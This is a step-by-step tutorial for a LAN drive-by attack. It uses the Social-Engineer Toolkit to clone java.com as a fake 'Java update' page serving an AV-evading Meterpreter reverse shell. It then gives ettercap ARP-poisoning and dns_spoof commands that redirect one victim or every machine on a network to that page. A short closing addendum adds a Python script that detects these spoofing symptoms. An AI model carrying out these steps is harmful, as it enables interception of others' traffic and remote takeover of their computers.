Step 1: Setting up the Fake-Page
A. Start SET
B. Choose Website Attack Vectors by typing 1
D. Here choose Custom Import, so you can use this script to clone the site in which you want to inject the DriveBy,
so that you can edit the content of the cloned page before SET makes evil stuff with it :P. I cloned for example www.java.com/en/, and after cloning I edited the index.html, changing the JAVA + YOU, DOWNLOAD TODAY part to something like IMPORTANT JAVA UPDATE. You don't have to use this option; you can simply use the Site Cloner from SET, too.
E. After choosing your site, you have to choose the payload. I recommend choice 2 (Windows Reverse_TCP Meterpreter) here, or if you know that your target has a 64-bit operating system, choose 5 (Windows Reverse_TCP Meterpreter x64), because the x64 one is completely FUD.
F. Now you have to choose the encryption of the payload, so that it won't get detected by the victim's AV. Just choose 16 (Backdoored Executable), which is currently the best.
Use ettercap to redirect slave(s) to your fake site
a. The first thing you have to do is open the etter.dns file, which is located in /usr/share/ettercap. Just delete everything in it, and if you want to redirect every site your slave visits, write the following into it:
* A yourip
If you only want to redirect one page, write this:
thesiteyouwanttoredirect A yourip
So in my specific case, the etter.dns file looks like this (everything gets redirected to my fake page):
* A 192.168.0.103
b. Running ettercap
After configuring everything, you can now run the following command:
ettercap -T -q -P dns_spoof -M ARP // //
This poisons the whole local network, which means that every PC in your local network gets redirected to your fake page.
If you want to redirect only one single PC, you have to run this command:
ettercap -T -q -P dns_spoof -M ARP /ipofyourvictim/ //
And here is what the parameters actually mean:
-T means text interface, so you get no annoying GUI
-q means quiet mode; ettercap doesn't display everything it does (which would be really annoying)
-P means ettercap has to use the dns_spoof plugin, which is responsible for the redirecting
-M ARP means man-in-the-middle attack via ARP poisoning: the whole traffic in your network goes first through your PC
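A defensive counterpart, added here and not part of the original tutorial: a small Python check for the two symptoms this setup leaves on a network, many unrelated domains all resolving to one LAN address (the wildcard etter.dns entry) and one MAC address answering for several IPs (ARP poisoning). The sample resolver answers and the `ip neigh` lines are constructed; `SAMPLE_ANSWERS` and `SAMPLE_NEIGH` are my placeholder names, not real data.

```python
"""Heuristics for spotting wildcard dns_spoof and ARP poisoning symptoms.
Inputs are constructed so this runs offline; in practice feed it real
resolver answers and the output of `ip neigh`."""
import ipaddress
from collections import Counter, defaultdict

# Constructed sample resolver answers: every name maps to the same LAN host.
SAMPLE_ANSWERS = {
    "www.java.com": "192.168.0.103",
    "www.example.com": "192.168.0.103",
    "update.microsoft.com": "192.168.0.103",
}

# Constructed sample `ip neigh` lines: gateway and a workstation share a MAC.
SAMPLE_NEIGH = """\
192.168.0.1 dev eth0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.0.103 dev eth0 lladdr aa:bb:cc:dd:ee:01 REACHABLE
192.168.0.50 dev eth0 lladdr aa:bb:cc:dd:ee:50 STALE
"""


def suspicious_dns(answers, min_domains=3):
    """Return the address if >= min_domains names share one private IP, else None."""
    if not answers:
        return None
    addr, n = Counter(answers.values()).most_common(1)[0]
    if n >= min_domains and ipaddress.ip_address(addr).is_private:
        return addr
    return None


def duplicate_macs(neigh_output):
    """Map MAC -> sorted IPs for every MAC that claims more than one IP."""
    by_mac = defaultdict(set)
    for line in neigh_output.splitlines():
        fields = line.split()
        if "lladdr" in fields:
            by_mac[fields[fields.index("lladdr") + 1]].add(fields[0])
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    print("spoofed resolver target:", suspicious_dns(SAMPLE_ANSWERS))
    print("MACs claiming several IPs:", duplicate_macs(SAMPLE_NEIGH))
```

A MAC that suddenly claims the gateway's IP as well as its own is the classic ARP-spoofing signature; comparing the local resolver's answers against a known-good external resolver catches the wildcard redirect.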